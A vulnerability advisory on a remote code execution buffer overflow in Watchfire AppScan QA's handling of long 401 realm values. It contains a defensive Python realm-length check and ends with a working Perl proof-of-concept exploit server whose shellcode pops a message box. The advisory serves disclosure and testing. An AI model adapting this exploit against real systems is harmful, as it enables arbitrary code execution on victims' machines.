AppScan QA is "an automated web application testing tool that provides QA personnel with security defect analysis and remediation information. Instead of manually searching for security defects, application testers trust AppScan QA to detect security defects and vulnerabilities automatically as an integrated component of enterprise development and testing processes. AppScan QA automates test script creation, modification, and maintenance to ensure reliable and repeatable testing". A vulnerability within Watchfire's AppScan allows remote attackers to cause the product to execute arbitrary code by overflowing the internal buffer used to store the HTTP response's Realm field.
Credit:
The information has been provided by Mariano Nunez Di Croce.
The original article can be found at: CYBSEC Security Advisory AppScanQA RemoteCodeExec (pdf)
Vulnerable Systems:
* AppScan QA version 5.0.609 / Subscription 7
* AppScan QA version 5.0.134
Immune Systems:
* AppScan QA version 5.0.609 / Subscription 8
The vulnerability specifically exists in the way AppScan QA processes 401 HTTP responses. If a custom 401 response is specially crafted, containing a WWW-Authenticate header with the Realm field consisting of more than 351 characters, a buffer overflow occurs, leading to remote code execution with the privileges of the user running AppScan QA.
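The defect described above is a missing bound on the realm value before it is stored. The following Python example is added here to show what that bound looks like on the receiving side; it is not code from the advisory, from CYBSEC or from Watchfire. It parses a raw 401 response, extracts the realm from the WWW-Authenticate header as an RFC 2617 quoted-string, and rejects the response before the value is copied or unescaped if the realm exceeds the limit. The 351-character figure is the one the advisory reports; the function names, the `OversizedRealm` error, and the two sample responses are this example's own constructions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Bound on the realm value. The advisory reports that realms longer than
# 351 characters overflowed the affected versions; the number is taken from
# the advisory, the policy of rejecting the response is this example's choice.
MAX_REALM_LEN = 351

# RFC 2617 quoted-string for realm="...", allowing backslash escapes inside.
_REALM_RE = re.compile(r'realm\s*=\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE)


class OversizedRealm(ValueError):
    """Raised when a WWW-Authenticate realm exceeds the configured bound."""


@dataclass
class AuthChallenge:
    scheme: str
    realm: str


def split_response(raw: bytes):
    """Split a raw HTTP response into (status_code, headers, body).

    Header names are lower-cased; a repeated header is joined with ', '.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError("malformed status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return int(parts[1]), headers, body


def parse_challenge(value: str, max_realm: int = MAX_REALM_LEN) -> AuthChallenge:
    """Parse one WWW-Authenticate value.

    The length bound is applied to the raw quoted content before anything is
    copied or unescaped, which is the check the vulnerable versions lacked.
    """
    scheme, _, params = value.strip().partition(" ")
    match = _REALM_RE.search(params)
    if match is None:
        raise ValueError("no quoted realm in WWW-Authenticate")
    raw_realm = match.group(1)
    if len(raw_realm) > max_realm:
        raise OversizedRealm(
            "realm of %d characters exceeds the %d-character bound"
            % (len(raw_realm), max_realm)
        )
    realm = re.sub(r"\\(.)", r"\1", raw_realm)  # undo quoted-pair escapes
    return AuthChallenge(scheme=scheme, realm=realm)


def check_401(raw: bytes, max_realm: int = MAX_REALM_LEN) -> Optional[AuthChallenge]:
    """Return the challenge carried by a 401, None for any other status,
    and raise OversizedRealm for a realm that breaks the bound."""
    status, headers, _ = split_response(raw)
    if status != 401:
        return None
    value = headers.get("www-authenticate")
    if value is None:
        raise ValueError("401 response without WWW-Authenticate")
    return parse_challenge(value, max_realm)


# Constructed sample responses for the demonstration (not captured traffic).
BENIGN_401 = (
    b"HTTP/1.1 401 Authorization Required\r\n"
    b"Server: Apache\r\n"
    b'WWW-Authenticate: Basic realm="Admin Area"\r\n'
    b"Content-Length: 0\r\n\r\n"
)
HOSTILE_401 = (
    b"HTTP/1.1 401 Authorization Required\r\n"
    + b'WWW-Authenticate: Basic realm="' + b"A" * 400 + b'"\r\n'
    + b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print("benign:", check_401(BENIGN_401))
    try:
        check_401(HOSTILE_401)
    except OversizedRealm as exc:
        print("rejected:", exc)
```

The same check is usable on the wire as well as in the client: a proxy or an IDS rule that flags 401 responses whose realm is longer than the bound will catch the condition the advisory describes without needing to know anything about the target product.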
Vendor Response:
* 10/12/2005: Initial Vendor Contact.
* 10/18/2005: Vendor Confirmed Vulnerability.
* 11/02/2005: Vendor Releases Update.
* 12/15/2005: Advisory Public Disclosure.
Exploit:
#!/usr/bin/perl -w
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to set up the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get a "You are vulnerable!" popup, you should upgrade immediately.
#
# PoC developed for Windows 2000 Server SP4.
#
use IO::Socket::INET;
# Disable buffering
$| = 1;
# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com" . "\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\n" . "Keep-Alive: timeout=15, max=100\r\nConnection: Close\r\n" . "Content-Type: text/html; charset=ISO-8859-1\r\n\r\n<a href='/admin'>admin</a>";
# Define the 401 Auth Required Header and Tail
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\"";
my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n<html><head>\r\n<title>401 Authorization Required</title>\r\n</head><body>\r\n<h1>Authorization Required</h1>\r\n<p>This server could not verify that you\r\nare authorized to access the document\r\nrequested. Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.</p>\r\n</body></html>";
# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);
my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb" . "\x21\x02\x59\x7c\x51\xff\xd3\xeb" . "\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c" . "\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13" . "\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69" . "\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72" . "\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61" . "\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59" . "\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72" . "\x61\x62\x6c\x65\x21\x4e";
my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail;
# Initialization of Fake WebServer
my $srv = IO::Socket::INET->new(LocalPort => 80,
                                Reuse     => 1,
                                Listen    => 1) || die "Could not create socket: $!\n";
print "Waiting for connections...\n";
while ($cli = $srv->accept()) {
    printf "Request from %s\n", $cli->peerhost;
    while (<$cli>) {
        if (s/(admin)/$1/) {
            # If Request is for "admin", launch the exploit
            printf "Request for protected resource detected...launching exploit\n";
            print $cli $resExploit;
        }
        else {
            # Else send a normal response
            print $cli $res200;
        }
    }
    close($cli);
}
close($srv);
Subject: hack the hackers - muhahaha
Date: 18 Dec. 2005
From: gadi
http://blogs.securiteam.com/index.php/archives/144